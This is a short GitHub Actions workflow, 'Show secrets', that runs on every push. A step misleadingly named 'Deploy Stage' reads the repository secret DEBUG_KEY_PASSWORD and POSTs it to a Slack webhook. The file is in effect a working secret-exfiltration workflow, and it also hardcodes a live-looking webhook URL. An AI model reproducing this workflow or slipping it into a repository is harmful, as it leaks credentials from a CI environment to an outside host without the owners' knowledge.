name: Show secrets
on: [push]
jobs:
  debug:
    name: Show secrets
    runs-on: ubuntu-latest
    steps:
      - name: Deploy Stage
        env:
          DEBUG_KEY_PASSWORD : ${{ secrets.DEBUG_KEY_PASSWORD  }}
        uses: fjogeleit/http-request-action@v1
        with:
          url: 'https://hooks.slack.com/services/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'
          method: 'POST'
          customHeaders: '{"Content-Type": "application/json"}'
          data: ${{ secrets.DEBUG_KEY_PASSWORD }}
